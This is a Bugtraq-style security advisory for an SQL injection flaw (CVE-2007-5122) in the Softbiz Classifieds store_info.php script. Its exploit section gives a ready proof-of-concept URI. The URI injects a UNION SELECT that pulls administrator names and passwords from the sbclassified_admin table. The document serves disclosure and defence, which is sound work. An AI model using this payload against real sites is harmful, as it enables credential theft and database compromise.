BID:25818

Softbiz Classifieds store_info.PHP SQL Injection Vulnerability

Info

Softbiz Classifieds store_info.PHP SQL Injection Vulnerability

Bugtraq ID:	25818
Class:	Input Validation Error
CVE:	CVE-2007-5122
Remote:	Yes
Local:	No
Published:	Sep 26 2007 12:00AM
Updated:	May 07 2015 05:35PM
Credit:	IRCRASH (R3d.w0rm & Dr.Crash) are credited with the discovery of this vulnerability.
Vulnerable:	SoftBiz Classifieds 0

Not Vulnerable:

Discussion

Softbiz Classifieds store_info.PHP SQL Injection Vulnerability

Softbiz Classifieds is prone to an SQL injection vulnerability.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Exploit / POC

Softbiz Classifieds store_info.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following sample URI is available: http://www.example.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,pwd,18,19,20,21,22/**/from/**/sbclassified_admin/*

Solution / Fix

Softbiz Classifieds store_info.PHP SQL Injection Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

References

Softbiz Classifieds store_info.PHP SQL Injection Vulnerability

References:

Softbiz Classifieds Hopepage (Softbiz)